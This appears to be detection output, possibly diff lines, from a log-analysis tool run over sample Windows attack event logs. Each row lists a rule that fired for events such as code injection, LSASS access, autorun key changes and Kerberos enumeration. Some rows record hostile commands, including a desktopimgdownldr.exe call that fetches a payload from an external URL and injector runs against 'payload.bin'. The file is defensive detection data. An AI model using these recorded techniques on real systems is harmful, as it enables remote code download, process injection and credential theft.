-2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious 
execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 
-2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx -2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion 
Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: 
admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 
05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
-2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 
0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 